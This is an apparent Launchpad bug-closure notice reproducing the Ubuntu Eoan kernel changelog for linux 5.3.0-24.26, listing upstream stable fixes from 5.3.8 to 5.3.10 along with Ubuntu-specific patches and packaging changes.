This bug was fixed in the package linux - 5.3.0-24.26

---------------
linux (5.3.0-24.26) eoan; urgency=medium

  * eoan/linux: 5.3.0-24.26 -proposed tracker (LP: #1852232)

  * Eoan update: 5.3.9 upstream stable release (LP: #1851550)
    - io_uring: fix up O_NONBLOCK handling for sockets
    - dm snapshot: introduce account_start_copy() and account_end_copy()
    - dm snapshot: rework COW throttling to fix deadlock
    - Btrfs: fix inode cache block reserve leak on failure to allocate data
      space
    - btrfs: qgroup: Always free PREALLOC META reserve in
      btrfs_delalloc_release_extents()
    - iio: adc: meson_saradc: Fix memory allocation order
    - iio: fix center temperature of bmc150-accel-core
    - libsubcmd: Make _FORTIFY_SOURCE defines dependent on the feature
    - perf tests: Avoid raising SEGV using an obvious NULL dereference
    - perf map: Fix overlapped map handling
    - perf script brstackinsn: Fix recovery from LBR/binary mismatch
    - perf jevents: Fix period for Intel fixed counters
    - perf tools: Propagate get_cpuid() error
    - perf annotate: Propagate perf_env__arch() error
    - perf annotate: Fix the signedness of failure returns
    - perf annotate: Propagate the symbol__annotate() error return
    - perf annotate: Fix arch specific ->init() failure errors
    - perf annotate: Return appropriate error code for allocation failures
    - perf annotate: Don't return -1 for error when doing BPF disassembly
    - staging: rtl8188eu: fix null dereference when kzalloc fails
    - RDMA/siw: Fix serialization issue in write_space()
    - RDMA/hfi1: Prevent memory leak in sdma_init
    - RDMA/iw_cxgb4: fix SRQ access from dump_qp()
    - RDMA/iwcm: Fix a lock inversion issue
    - HID: hyperv: Use in-place iterator API in the channel callback
    - kselftest: exclude failed TARGETS from runlist
    - selftests/kselftest/runner.sh: Add 45 second timeout per test
    - nfs: Fix nfsi->nrequests count error on nfs_inode_remove_request
    - arm64: cpufeature: Effectively expose FRINT capability to userspace
    - arm64: Fix incorrect irqflag restore for priority masking for compat
    - arm64: ftrace: Ensure synchronisation in PLT setup for Neoverse-N1
      #1542419
    - tty: serial: owl: Fix the link time qualifier of 'owl_uart_exit()'
    - tty: serial: rda: Fix the link time qualifier of 'rda_uart_exit()'
    - serial/sifive: select SERIAL_EARLYCON
    - tty: n_hdlc: fix build on SPARC
    - misc: fastrpc: prevent memory leak in fastrpc_dma_buf_attach
    - RDMA/core: Fix an error handling path in 'res_get_common_doit()'
    - RDMA/cm: Fix memory leak in cm_add/remove_one
    - RDMA/nldev: Reshuffle the code to avoid need to rebind QP in error path
    - RDMA/mlx5: Do not allow rereg of a ODP MR
    - RDMA/mlx5: Order num_pending_prefetch properly with synchronize_srcu
    - RDMA/mlx5: Add missing synchronize_srcu() for MW cases
    - gpio: max77620: Use correct unit for debounce times
    - fs: cifs: mute -Wunused-const-variable message
    - arm64: vdso32: Fix broken compat vDSO build warnings
    - arm64: vdso32: Detect binutils support for dmb ishld
    - serial: mctrl_gpio: Check for NULL pointer
    - serial: 8250_omap: Fix gpio check for auto RTS/CTS
    - arm64: Default to building compat vDSO with clang when CONFIG_CC_IS_CLANG
    - arm64: vdso32: Don't use KBUILD_CPPFLAGS unconditionally
    - efi/cper: Fix endianness of PCIe class code
    - efi/x86: Do not clean dummy variable in kexec path
    - MIPS: include: Mark __cmpxchg as __always_inline
    - riscv: avoid kernel hangs when trapped in BUG()
    - riscv: avoid sending a SIGTRAP to a user thread trapped in WARN()
    - riscv: Correct the handling of unexpected ebreak in do_trap_break()
    - x86/xen: Return from panic notifier
    - ocfs2: clear zero in unaligned direct IO
    - fs: ocfs2: fix possible null-pointer dereferences in
      ocfs2_xa_prepare_entry()
    - fs: ocfs2: fix a possible null-pointer dereference in
      ocfs2_write_end_nolock()
    - fs: ocfs2: fix a possible null-pointer dereference in
      ocfs2_info_scan_inode_alloc()
    - btrfs: silence maybe-uninitialized warning in clone_range
    - arm64: armv8_deprecated: Checking return value for memory allocation
    - sched/fair: Scale bandwidth quota and period without losing quota/period
      ratio precision
    - sched/vtime: Fix guest/system mis-accounting on task switch
    - perf/core: Rework memory accounting in perf_mmap()
    - perf/core: Fix corner case in perf_rotate_context()
    - perf/x86/amd: Change/fix NMI latency mitigation to use a timestamp
    - drm/amdgpu: fix memory leak
    - iio: imu: adis16400: release allocated memory on failure
    - iio: imu: adis16400: fix memory leak
    - iio: imu: st_lsm6dsx: fix waitime for st_lsm6dsx i2c controller
    - MIPS: include: Mark __xchg as __always_inline
    - MIPS: fw: sni: Fix out of bounds init of o32 stack
    - s390/cio: fix virtio-ccw DMA without PV
    - virt: vbox: fix memory leak in hgcm_call_preprocess_linaddr
    - nbd: fix possible sysfs duplicate warning
    - NFSv4: Fix leak of clp->cl_acceptor string
    - SUNRPC: fix race to sk_err after xs_error_report
    - s390/uaccess: avoid (false positive) compiler warnings
    - tracing: Initialize iter->seq after zeroing in tracing_read_pipe()
    - perf annotate: Fix multiple memory and file descriptor leaks
    - perf/aux: Fix tracking of auxiliary trace buffer allocation
    - USB: legousbtower: fix a signedness bug in tower_probe()
    - nbd: verify socket is supported during setup
    - fuse: flush dirty data/metadata before non-truncate setattr
    - fuse: truncate pending writes on O_TRUNC
    - ALSA: bebob: Fix prototype of helper function to return negative value
    - ALSA: timer: Fix mutex deadlock at releasing card
    - ath10k: fix latency issue for QCA988x
    - UAS: Revert commit 3ae62a42090f ("UAS: fix alignment of scatter/gather
      segments")
    - nl80211: fix validation of mesh path nexthop
    - USB: gadget: Reject endpoints with 0 maxpacket value
    - usb-storage: Revert commit 747668dbc061 ("usb-storage: Set
      virt_boundary_mask to avoid SG overflows")
    - USB: ldusb: fix ring-buffer locking
    - USB: ldusb: fix control-message timeout
    - usb: xhci: fix Immediate Data Transfer endianness
    - usb: xhci: fix __le32/__le64 accessors in debugfs code
    - USB: serial: whiteheat: fix potential slab corruption
    - USB: serial: whiteheat: fix line-speed endianness
    - xhci: Fix use-after-free regression in xhci clear hub TT implementation
    - scsi: qla2xxx: Fix partial flash write of MBI
    - scsi: target: cxgbit: Fix cxgbit_fw4_ack()
    - HID: i2c-hid: add Trekstor Primebook C11B to descriptor override
    - HID: Fix assumption that devices have inputs
    - HID: fix error message in hid_open_report()
    - HID: logitech-hidpp: split g920_get_config()
    - HID: logitech-hidpp: rework device validation
    - HID: logitech-hidpp: do all FF cleanup in hidpp_ff_destroy()
    - um-ubd: Entrust re-queue to the upper layers
    - s390/unwind: fix mixing regs and sp
    - s390/cmm: fix information leak in cmm_timeout_handler()
    - s390/idle: fix cpu idle time calculation
    - ARC: perf: Accommodate big-endian CPU
    - IB/hfi1: Avoid excessive retry for TID RDMA READ request
    - arm64: Ensure VM_WRITE|VM_SHARED ptes are clean by default
    - arm64: cpufeature: Enable Qualcomm Falkor/Kryo errata 1003
    - virtio_ring: fix stalls for packed rings
    - rtlwifi: rtl_pci: Fix problem of too small skb->len
    - dmaengine: qcom: bam_dma: Fix resource leak
    - dmaengine: tegra210-adma: fix transfer failure
    - dmaengine: imx-sdma: fix size check for sdma script_number
    - dmaengine: cppi41: Fix cppi41_dma_prep_slave_sg() when idle
    - drm/amdgpu/gmc10: properly set BANK_SELECT and FRAGMENT_SIZE
    - drm/i915: Fix PCH reference clock for FDI on HSW/BDW
    - drm/amdgpu/gfx10: update gfx golden settings
    - drm/amdgpu/powerplay/vega10: allow undervolting in p7
    - drm/amdgpu: Fix SDMA hang when performing VKexample test
    - NFS: Fix an RCU lock leak in nfs4_refresh_delegation_stateid()
    - io_uring: ensure we clear io_kiocb->result before each issue
    - iommu/vt-d: Fix panic after kexec -p for kdump
    - batman-adv: Avoid free/alloc race when handling OGM buffer
    - llc: fix sk_buff leak in llc_sap_state_process()
    - llc: fix sk_buff leak in llc_conn_service()
    - rxrpc: Fix call ref leak
    - rxrpc: rxrpc_peer needs to hold a ref on the rxrpc_local record
    - rxrpc: Fix trace-after-put looking at the put peer record
    - NFC: pn533: fix use-after-free and memleaks
    - bonding: fix potential NULL deref in bond_update_slave_arr
    - netfilter: conntrack: avoid possible false sharing
    - net: usb: sr9800: fix uninitialized local variable
    - sch_netem: fix rcu splat in netem_enqueue()
    - net: sched: sch_sfb: don't call qdisc_put() while holding tree lock
    - iwlwifi: exclude GEO SAR support for 3168
    - sched/fair: Fix low cpu usage with high throttling by removing expiration
      of cpu-local slices
    - ALSA: usb-audio: DSD auto-detection for Playback Designs
    - ALSA: usb-audio: Update DSD support quirks for Oppo and Rotel
    - ALSA: usb-audio: Add DSD support for Gustard U16/X26 USB Interface
    - RDMA/mlx5: Use irq xarray locking for mkey_table
    - sched/fair: Fix -Wunused-but-set-variable warnings
    - powerpc/powernv: Fix CPU idle to be called with IRQs disabled
    - Revert "nvme: allow 64-bit results in passthru commands"
    - Revert "ALSA: hda: Flush interrupts on disabling"
    - Linux 5.3.9
    - [Config] Remove CONFIG_GENERIC_COMPAT_VDSO and
      CONFIG_CROSS_COMPILE_COMPAT_VDSO

  * Eoan update: v5.3.8 upstream stable release (LP: #1850456)
    - drm: Free the writeback_job when it with an empty fb
    - drm: Clear the fence pointer when writeback job signaled
    - clk: ti: dra7: Fix mcasp8 clock bits
    - ARM: dts: Fix wrong clocks for dra7 mcasp
    - nvme-pci: Fix a race in controller removal
    - scsi: ufs: skip shutdown if hba is not powered
    - scsi: megaraid: disable device when probe failed after enabled device
    - scsi: qla2xxx: Silence fwdump template message
    - scsi: qla2xxx: Fix unbound sleep in fcport delete path.
    - scsi: qla2xxx: Fix stale mem access on driver unload
    - scsi: qla2xxx: Fix N2N link reset
    - scsi: qla2xxx: Fix N2N link up fail
    - ARM: dts: Fix gpio0 flags for am335x-icev2
    - ARM: OMAP2+: Fix missing reset done flag for am3 and am43
    - ARM: OMAP2+: Add missing LCDC midlemode for am335x
    - ARM: OMAP2+: Fix warnings with broken omap2_set_init_voltage()
    - nvme-tcp: fix wrong stop condition in io_work
    - nvme-pci: Save PCI state before putting drive into deepest state
    - nvme: fix an error code in nvme_init_subsystem()
    - nvme-rdma: Fix max_hw_sectors calculation
    - Added QUIRKs for ADATA XPG SX8200 Pro 512GB
    - nvme: Add quirk for Kingston NVME SSD running FW E8FK11.T
    - nvme: allow 64-bit results in passthru commands
    - drm/komeda: prevent memory leak in komeda_wb_connector_add
    - nvme-rdma: fix possible use-after-free in connect timeout
    - blk-mq: honor IO scheduler for multiqueue devices
    - ieee802154: ca8210: prevent memory leak
    - ARM: dts: am4372: Set memory bandwidth limit for DISPC
    - net: dsa: qca8k: Use up to 7 ports for all operations
    - MIPS: dts: ar9331: fix interrupt-controller size
    - xen/efi: Set nonblocking callbacks
    - loop: change queue block size to match when using DIO
    - nl80211: fix null pointer dereference
    - mac80211: fix txq null pointer dereference
    - netfilter: nft_connlimit: disable bh on garbage collection
    - net: mscc: ocelot: add missing of_node_put after calling
      of_get_child_by_name
    - net: dsa: rtl8366rb: add missing of_node_put after calling
      of_get_child_by_name
    - net: stmmac: xgmac: Not all Unicast addresses may be available
    - net: stmmac: dwmac4: Always update the MAC Hash Filter
    - net: stmmac: Correctly take timestamp for PTPv2
    - net: stmmac: Do not stop PHY if WoL is enabled
    - net: ag71xx: fix mdio subnode support
    - RISC-V: Clear load reservations while restoring hart contexts
    - riscv: Fix memblock reservation for device tree blob
    - drm/amdgpu: fix multiple memory leaks in acp_hw_init
    - drm/amd/display: memory leak
    - mips: Loongson: Fix the link time qualifier of 'serial_exit()'
    - net: hisilicon: Fix usage of uninitialized variable in function
      mdio_sc_cfg_reg_write()
    - net: stmmac: Avoid deadlock on suspend/resume
    - selftests: kvm: Fix libkvm build error
    - lib: textsearch: fix escapes in example code
    - s390/mm: fix -Wunused-but-set-variable warnings
    - net: phy: allow for reset line to be tied to a sleepy GPIO controller
    - net: phy: fix write to mii-ctrl1000 register
    - namespace: fix namespace.pl script to support relative paths
    - Convert filldir[64]() from __put_user() to unsafe_put_user()
    - elf: don't use MAP_FIXED_NOREPLACE for elf executable mappings
    - Make filldir[64]() verify the directory entry filename is valid
    - uaccess: implement a proper unsafe_copy_to_user() and switch filldir over
      to it
    - filldir[64]: remove WARN_ON_ONCE() for bad directory entries
    - net_sched: fix backward compatibility for TCA_KIND
    - net_sched: fix backward compatibility for TCA_ACT_KIND
    - libata/ahci: Fix PCS quirk application
    - Revert "drm/radeon: Fix EEH during kexec"
    - ocfs2: fix panic due to ocfs2_wq is null
    - nvme-pci: Set the prp2 correctly when using more than 4k page
    - ipv4: fix race condition between route lookup and invalidation
    - ipv4: Return -ENETUNREACH if we can't create route but saddr is valid
    - net: avoid potential infinite loop in tc_ctl_action()
    - net: bcmgenet: Fix RGMII_MODE_EN value for GENET v1/2/3
    - net: bcmgenet: Set phydev->dev_flags only for internal PHYs
    - net: i82596: fix dma_alloc_attr for sni_82596
    - net/ibmvnic: Fix EOI when running in XIVE mode.
    - net: ipv6: fix listify ip6_rcv_finish in case of forwarding
    - net: stmmac: disable/enable ptp_ref_clk in suspend/resume flow
    - rxrpc: Fix possible NULL pointer access in ICMP handling
    - sched: etf: Fix ordering of packets with same txtime
    - sctp: change sctp_prot .no_autobind with true
    - net: aquantia: temperature retrieval fix
    - net: aquantia: when cleaning hw cache it should be toggled
    - net: aquantia: do not pass lro session with invalid tcp checksum
    - net: aquantia: correctly handle macvlan and multicast coexistence
    - net: phy: micrel: Discern KSZ8051 and KSZ8795 PHYs
    - net: phy: micrel: Update KSZ87xx PHY name
    - net: avoid errors when trying to pop MLPS header on non-MPLS packets
    - net/sched: fix corrupted L2 header with MPLS 'push' and 'pop' actions
    - netdevsim: Fix error handling in nsim_fib_init and nsim_fib_exit
    - net: ethernet: broadcom: have drivers select DIMLIB as needed
    - net: phy: Fix "link partner" information disappear issue
    - rxrpc: use rcu protection while reading sk->sk_user_data
    - io_uring: fix bad inflight accounting for SETUP_IOPOLL|SETUP_SQTHREAD
    - io_uring: Fix corrupted user_data
    - USB: legousbtower: fix memleak on disconnect
    - ALSA: hda/realtek - Add support for ALC711
    - ALSA: hda/realtek - Enable headset mic on Asus MJ401TA
    - ALSA: usb-audio: Disable quirks for BOSS Katana amplifiers
    - ALSA: hda - Force runtime PM on Nvidia HDMI codecs
    - usb: udc: lpc32xx: fix bad bit shift operation
    - USB: serial: ti_usb_3410_5052: fix port-close races
    - USB: ldusb: fix memleak on disconnect
    - USB: usblp: fix use-after-free on disconnect
    - USB: ldusb: fix read info leaks
    - binder: Don't modify VMA bounds in ->mmap handler
    - MIPS: tlbex: Fix build_restore_pagemask KScratch restore
    - staging: wlan-ng: fix exit return when sme->key_idx >= NUM_WEPKEYS
    - scsi: zfcp: fix reaction on bit error threshold notification
    - scsi: sd: Ignore a failure to sync cache due to lack of authorization
    - scsi: core: save/restore command resid for error handling
    - scsi: core: try to get module before removing device
    - scsi: ch: Make it possible to open a ch device multiple times again
    - Revert "Input: elantech - enable SMBus on new (2018+) systems"
    - Input: da9063 - fix capability and drop KEY_SLEEP
    - Input: synaptics-rmi4 - avoid processing unknown IRQs
    - Input: st1232 - fix reporting multitouch coordinates
    - ASoC: rsnd: Reinitialize bit clock inversion flag for every format setting
    - ACPI: CPPC: Set pcc_data[pcc_ss_id] to NULL in acpi_cppc_processor_exit()
    - ACPI: NFIT: Fix unlock on error in scrub_show()
    - iwlwifi: pcie: change qu with jf devices to use qu configuration
    - cfg80211: wext: avoid copying malformed SSIDs
    - mac80211: Reject malformed SSID elements
    - drm/ttm: Restore ttm prefaulting
    - drm/panfrost: Handle resetting on timeout better
    - drm/amdgpu: Bail earlier when amdgpu.cik_/si_support is not set to 1
    - drm/amdgpu/sdma5: fix mask value of POLL_REGMEM packet for pipe sync
    - drm/i915/userptr: Never allow userptr into the mappable GGTT
    - drm/i915: Favor last VBT child device with conflicting AUX ch/DDC pin
    - drm/amdgpu/vce: fix allocation size in enc ring test
    - drm/amdgpu/vcn: fix allocation size in enc ring test
    - drm/amdgpu/uvd6: fix allocation size in enc ring test (v2)
    - drm/amdgpu/uvd7: fix allocation size in enc ring test (v2)
    - drm/amdgpu: user pages array memory leak fix
    - drivers/base/memory.c: don't access uninitialized memmaps in
      soft_offline_page_store()
    - fs/proc/page.c: don't access uninitialized memmaps in fs/proc/page.c
    - io_uring: Fix broken links with offloading
    - io_uring: Fix race for sqes with userspace
    - io_uring: used cached copies of sq->dropped and cq->overflow
    - mmc: mxs: fix flags passed to dmaengine_prep_slave_sg
    - mmc: cqhci: Commit descriptors before setting the doorbell
    - mmc: sdhci-omap: Fix Tuning procedure for temperatures < -20C
    - mm/memory-failure.c: don't access uninitialized memmaps in
      memory_failure()
    - mm/slub: fix a deadlock in show_slab_objects()
    - mm/page_owner: don't access uninitialized memmaps when reading
      /proc/pagetypeinfo
    - mm/memunmap: don't access uninitialized memmap in memunmap_pages()
    - mm: memcg/slab: fix panic in __free_slab() caused by premature memcg
      pointer release
    - mm, compaction: fix wrong pfn handling in __reset_isolation_pfn()
    - mm: memcg: get number of pages on the LRU list in memcgroup base on
      lru_zone_size
    - mm: memblock: do not enforce current limit for memblock_phys* family
    - hugetlbfs: don't access uninitialized memmaps in
      pfn_range_valid_gigantic()
    - mm/memory-failure: poison read receives SIGKILL instead of SIGBUS if
      mmaped more than once
    - zram: fix race between backing_dev_show and backing_dev_store
    - xtensa: drop EXPORT_SYMBOL for outs*/ins*
    - xtensa: fix change_bit in exclusive access option
    - s390/zcrypt: fix memleak at release
    - s390/kaslr: add support for R_390_GLOB_DAT relocation type
    - lib/vdso: Make clock_getres() POSIX compliant again
    - parisc: Fix vmap memory leak in ioremap()/iounmap()
    - EDAC/ghes: Fix Use after free in ghes_edac remove path
    - arm64: KVM: Trap VM ops when ARM64_WORKAROUND_CAVIUM_TX2_219_TVM is set
    - arm64: Avoid Cavium TX2 erratum 219 when switching TTBR
    - arm64: Enable workaround for Cavium TX2 erratum 219 when running SMT
    - arm64: Allow CAVIUM_TX2_ERRATUM_219 to be selected
    - CIFS: avoid using MID 0xFFFF
    - cifs: Fix missed free operations
    - CIFS: Fix use after free of file info structures
    - perf/aux: Fix AUX output stopping
    - tracing: Fix race in perf_trace_buf initialization
    - fs/dax: Fix pmd vs pte conflict detection
    - dm cache: fix bugs when a GFP_NOWAIT allocation fails
    - irqchip/sifive-plic: Switch to fasteoi flow
    - x86/boot/64: Make level2_kernel_pgt pages invalid outside kernel area
    - x86/apic/x2apic: Fix a NULL pointer deref when handling a dying cpu
    - x86/hyperv: Make vapic support x2apic mode
    - pinctrl: cherryview: restore Strago DMI workaround for all versions
    - pinctrl: armada-37xx: fix control of pins 32 and up
    - pinctrl: armada-37xx: swap polarity on LED group
    - btrfs: block-group: Fix a memory leak due to missing
      btrfs_put_block_group()
    - Btrfs: add missing extents release on file extent cluster relocation error
    - btrfs: don't needlessly create extent-refs kernel thread
    - Btrfs: fix qgroup double free after failure to reserve metadata for
      delalloc
    - Btrfs: check for the full sync flag while holding the inode lock during
      fsync
    - btrfs: tracepoints: Fix wrong parameter order for qgroup events
    - btrfs: tracepoints: Fix bad entry members of qgroup events
    - KVM: PPC: Book3S HV: XIVE: Ensure VP isn't already in use
    - memstick: jmb38x_ms: Fix an error handling path in 'jmb38x_ms_probe()'
    - cpufreq: Avoid cpufreq_suspend() deadlock on system shutdown
    - ceph: just skip unrecognized info in ceph_reply_info_extra
    - xen/netback: fix error path of xenvif_connect_data()
    - PCI: PM: Fix pci_power_up()
    - opp: of: drop incorrect lockdep_assert_held()
    - of: reserved_mem: add missing of_node_put() for proper ref-counting
    - blk-rq-qos: fix first node deletion of rq_qos_del()
    - RDMA/cxgb4: Do not dma memory off of the stack
    - Linux 5.3.8
    - [Config] CONFIG_CAVIUM_TX2_ERRATUM_219=y

  * Eoan update: 5.3.10 upstream stable release (LP: #1852111)
    - regulator: of: fix suspend-min/max-voltage parsing
    - ASoC: samsung: arndale: Add missing OF node dereferencing
    - ASoC: wm8994: Do not register inapplicable controls for WM1811
    - regulator: da9062: fix suspend_enable/disable preparation
    - ASoC: topology: Fix a signedness bug in soc_tplg_dapm_widget_create()
    - arm64: dts: allwinner: a64: pine64-plus: Add PHY regulator delay
    - arm64: dts: allwinner: a64: Drop PMU node
    - arm64: dts: allwinner: a64: sopine-baseboard: Add PHY regulator delay
    - arm64: dts: Fix gpio to pinmux mapping
    - regulator: ti-abb: Fix timeout in
      ti_abb_wait_txdone/ti_abb_clear_all_txdone
    - pinctrl: intel: Allocate IRQ chip dynamic
    - ASoC: SOF: loader: fix kernel oops on firmware boot failure
    - ASoC: SOF: topology: fix parse fail issue for byte/bool tuple types
    - ASoC: SOF: Intel: hda: fix warnings during FW load
    - ASoC: SOF: Intel: initialise and verify FW crash dump data.
    - ASoC: SOF: Intel: hda: Disable DMI L1 entry during capture
    - ASoC: rt5682: add NULL handler to set_jack function
    - ASoC: intel: sof_rt5682: add remove function to disable jack
    - ASoC: intel: bytcr_rt5651: add null check to support_button_press
    - regulator: pfuze100-regulator: Variable "val" in
      pfuze100_regulator_probe() could be uninitialized
    - ASoC: wm_adsp: Don't generate kcontrols without READ flags
    - ASoc: rockchip: i2s: Fix RPM imbalance
    - arm64: dts: rockchip: fix Rockpro64 RK808 interrupt line
    - ARM: dts: logicpd-torpedo-som: Remove twl_keypad
    - arm64: dts: rockchip: fix RockPro64 vdd-log regulator settings
    - arm64: dts: rockchip: fix RockPro64 sdhci settings
    - pinctrl: ns2: Fix off by one bugs in ns2_pinmux_enable()
    - pinctrl: stmfx: fix null pointer on remove
    - arm64: dts: zii-ultra: fix ARM regulator states
    - ARM: dts: am3874-iceboard: Fix 'i2c-mux-idle-disconnect' usage
    - ASoC: msm8916-wcd-digital: add missing MIX2 path for RX1/2
    - ASoC: simple_card_utils.h: Fix potential multiple redefinition error
    - ARM: dts: Use level interrupt for omap4 & 5 wlcore
    - ARM: mm: fix alignment handler faults under memory pressure
    - scsi: qla2xxx: fix a potential NULL pointer dereference
    - scsi: scsi_dh_alua: handle RTPG sense code correctly during state
      transitions
    - scsi: sni_53c710: fix compilation error
    - scsi: fix kconfig dependency warning related to 53C700_LE_ON_BE
    - ARM: 8908/1: add __always_inline to functions called from
      __get_user_check()
    - ARM: 8914/1: NOMMU: Fix exc_ret for XIP
    - arm64: dts: rockchip: fix RockPro64 sdmmc settings
    - arm64: dts: rockchip: Fix usb-c on Hugsun X99 TV Box
    - arm64: dts: lx2160a: Correct CPU core idle state name
    - ARM: dts: imx6q-logicpd: Re-Enable SNVS power key
    - ARM: dts: vf610-zii-scu4-aib: Specify 'i2c-mux-idle-disconnect'
    - ARM: dts: imx7s: Correct GPT's ipg clock source
    - arm64: dts: imx8mq: Use correct clock for usdhc's ipg clk
    - arm64: dts: imx8mm: Use correct clock for usdhc's ipg clk
    - perf tools: Fix resource leak of closedir() on the error paths
    - perf c2c: Fix memory leak in build_cl_output()
    - 8250-men-mcb: fix error checking when get_num_ports returns -ENODEV
    - perf kmem: Fix memory leak in compact_gfp_flags()
    - ARM: davinci: dm365: Fix McBSP dma_slave_map entry
    - drm/amdgpu: fix potential VM faults
    - drm/amdgpu: fix error handling in amdgpu_bo_list_create
    - scsi: target: core: Do not overwrite CDB byte 1
    - scsi: hpsa: add missing hunks in reset-patch
    - ASoC: Intel: sof-rt5682: add a check for devm_clk_get
    - ASoC: SOF: control: return true when kcontrol values change
    - tracing: Fix "gfp_t" format for synthetic events
    - ARM: dts: bcm2837-rpi-cm3: Avoid leds-gpio probing issue
    - i2c: aspeed: fix master pending state handling
    - drm/komeda: Don't flush inactive pipes
    - ARM: 8926/1: v7m: remove register save to stack before svc
    - selftests: kvm: vmx_set_nested_state_test: don't check for VMX support
      twice
    - selftests: kvm: fix sync_regs_test with newer gccs
    - ALSA: hda: Add Tigerlake/Jasperlake PCI ID
    - of: unittest: fix memory leak in unittest_data_add
    - MIPS: bmips: mark exception vectors as char arrays
    - irqchip/gic-v3-its: Use the exact ITSList for VMOVP
    - i2c: mt65xx: fix NULL ptr dereference
    - i2c: stm32f7: fix first byte to send in slave mode
    - i2c: stm32f7: fix a race in slave mode with arbitration loss irq
    - i2c: stm32f7: remove warning when compiling with W=1
    - cifs: Fix cifsInodeInfo lock_sem deadlock when reconnect occurs
    - irqchip/sifive-plic: Skip contexts except supervisor in plic_init()
    - nbd: protect cmd->status with cmd->lock
    - nbd: handle racing with error'ed out commands
    - cxgb4: fix panic when attaching to ULD fail
    - cxgb4: request the TX CIDX updates to status page
    - dccp: do not leak jiffies on the wire
    - erspan: fix the tun_info options_len check for erspan
    - inet: stop leaking jiffies on the wire
    - net: annotate accesses to sk->sk_incoming_cpu
    - net: annotate lockless accesses to sk->sk_napi_id
    - net: dsa: bcm_sf2: Fix IMP setup for port different than 8
    - net: ethernet: ftgmac100: Fix DMA coherency issue with SW checksum
    - net: fix sk_page_frag() recursion from memory reclaim
    - net: hisilicon: Fix ping latency when deal with high throughput
    - net/mlx4_core: Dynamically set guaranteed amount of counters per VF
    - netns: fix GFP flags in rtnl_net_notifyid()
    - net: rtnetlink: fix a typo fbd -> fdb
    - net: usb: lan78xx: Disable interrupts before calling generic_handle_irq()
    - SAUCE: Revert "UBUNTU: SAUCE: (no-up) net: Zeroing the structure
      ethtool_wolinfo in ethtool_get_wol()"
    - net: Zeroing the structure ethtool_wolinfo in ethtool_get_wol()
    - selftests: net: reuseport_dualstack: fix uninitalized parameter
    - udp: fix data-race in udp_set_dev_scratch()
    - vxlan: check tun_info options_len properly
    - net: add skb_queue_empty_lockless()
    - udp: use skb_queue_empty_lockless()
    - net: use skb_queue_empty_lockless() in poll() handlers
    - net: use skb_queue_empty_lockless() in busy poll contexts
    - net: add READ_ONCE() annotation in __skb_wait_for_more_packets()
    - ipv4: fix route update on metric change.
    - selftests: fib_tests: add more tests for metric update
    - net/smc: fix closing of fallback SMC sockets
    - net/smc: keep vlan_id for SMC-R in smc_listen_work()
    - keys: Fix memory leak in copy_net_ns
    - net: phylink: Fix phylink_dbg() macro
    - rxrpc: Fix handling of last subpacket of jumbo packet
    - net/mlx5e: Determine source port properly for vlan push action
    - net/mlx5e: Remove incorrect match criteria assignment line
    - net/mlx5e: Initialize on stack link modes bitmap
    - net/mlx5: Fix flow counter list auto bits struct
    - net/smc: fix refcounting for non-blocking connect()
    - net/mlx5: Fix rtable reference leak
    - mlxsw: core: Unpublish devlink parameters during reload
    - r8169: fix wrong PHY ID issue with RTL8168dp
    - net/mlx5e: Fix ethtool self test: link speed
    - net/mlx5e: Fix handling of compressed CQEs in case of low NAPI budget
    - ipv4: fix IPSKB_FRAG_PMTU handling with fragmentation
    - net: bcmgenet: don't set phydev->link from MAC
    - net: dsa: b53: Do not clear existing mirrored port mask
    - net: dsa: fix switch tree list
    - net: ensure correct skb->tstamp in various fragmenters
    - net: hns3: fix mis-counting IRQ vector numbers issue
    - net: netem: fix error path for corrupted GSO frames
    - net: reorder 'struct net' fields to avoid false sharing
    - net: usb: lan78xx: Connect PHY before registering MAC
    - r8152: add device id for Lenovo ThinkPad USB-C Dock Gen 2
    - net: netem: correct the parent's backlog when corrupted packet was dropped
    - net: phy: bcm7xxx: define soft_reset for 40nm EPHY
    - net: bcmgenet: reset 40nm EPHY on energy detect
    - net/flow_dissector: switch to siphash
    - platform/x86: pmc_atom: Add Siemens SIMATIC IPC227E to critclk_systems DMI
      table
    - CIFS: Fix retry mid list corruption on reconnects
    - selftests/powerpc: Add test case for tlbie vs mtpidr ordering issue
    - selftests/powerpc: Fix compile error on tlbie_test due to newer gcc
    - ASoC: pcm3168a: The codec does not support S32_LE
    - arm64: dts: ti: k3-am65-main: Fix gic-its node unit-address
    - usb: gadget: udc: core: Fix segfault if udc_bind_to_driver() for pending
      driver fails
    - Linux 5.3.10
    - [Config] SND_SOC_SOF_HDA_ALWAYS_ENABLE_DMI_L1=n

  * Some EFI systems fail to boot in efi_init() when booted via maas
    (LP: #1851810)
    - efi: efi_get_memory_map -- increase map headroom

  * dkms artifacts may expire from the pool (LP: #1850958)
    - [Packaging] dkms -- try launchpad librarian for pool downloads
    - [Packaging] dkms -- dkms-build quieten wget verbiage

  * update ENA driver to version 2.1.0 (LP: #1850175)
    - net: ena: don't wake up tx queue when down
    - net: ena: clean up indentation issue

  * drm/i915: Add support for another CMP-H PCH (LP: #1848491)
    - drm/i915/cml: Add second PCH ID for CMP

  * Add Intel Comet Lake ethernet support (LP: #1848555)
    - SAUCE: e1000e: Add support for Comet Lake

  * seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test (LP: #1849281)
    - SAUCE: seccomp: rework define for SECCOMP_USER_NOTIF_FLAG_CONTINUE
    - SAUCE: seccomp: avoid overflow in implicit constant conversion
    - SAUCE: seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test

  * tsc marked unstable after entered PC10 on Intel CoffeeLake (LP: #1840239)
    - SAUCE: x86/intel: Disable HPET on Intel Coffe Lake platforms
    - SAUCE: x86/intel: Disable HPET on Intel Ice Lake platforms

  * cloudimg: no iavf/i40evf module so no network available with SR-IOV enabled
    cloud (LP: #1848481)
    - [Packaging] include iavf/i40evf in generic

  * High power consumption using 5.0.0-25-generic (LP: #1840835)
    - PCI: Add a helper to check Power Resource Requirements _PR3 existence
    - ALSA: hda: Allow HDA to be runtime suspended when dGPU is not bound to a
      driver
    - PCI: Fix missing inline for pci_pr3_present()

  * CML CPUIDs (LP: #1843794)
    - x86/cpu: Add Comet Lake to the Intel CPU models header

  * shiftfs: prevent exceeding project quotas (LP: #1849483)
    - SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective capabilities

  * shiftfs: fix fallocate() (LP: #1849482)
    - SAUCE: shiftfs: setup correct s_maxbytes limit

  * Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message
    (LP: #1850443)
    - Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message

  * [SRU][B/OEM-B/OEM-OSP1/D/E] UBUNTU: SAUCE: add rtl623 codec support and fix
